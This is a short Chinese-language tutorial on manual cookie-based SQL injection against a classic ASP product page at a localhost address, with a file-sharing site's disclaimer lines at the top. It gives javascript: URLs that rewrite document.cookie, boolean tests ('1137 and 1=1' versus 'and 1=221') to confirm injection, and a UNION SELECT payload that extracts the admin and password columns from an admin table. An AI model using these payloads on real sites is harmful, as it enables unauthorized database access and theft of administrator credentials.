cookie手工注入
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
1.先访问当前注入点文件名
2.修改cookie
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
注入点:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137
注入点文件名:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?
javascript:alert(document.cookie="id="+escape("260"));
内容:document.cookie="id="+escape("260")
document.cookie //修改cookie
"id="+escape("260")
//id是咱们注入点的参数
260 //参数值
javascript //使用js语句
alert //弹出窗口,
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
判断是否存在注入
javascript:alert(document.cookie="id="+escape("1137 and 1=1"));
返回正常
javascript:alert(document.cookie="id="+escape("1137 and 1=221"));
返回错误
查询指定管理员
javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));。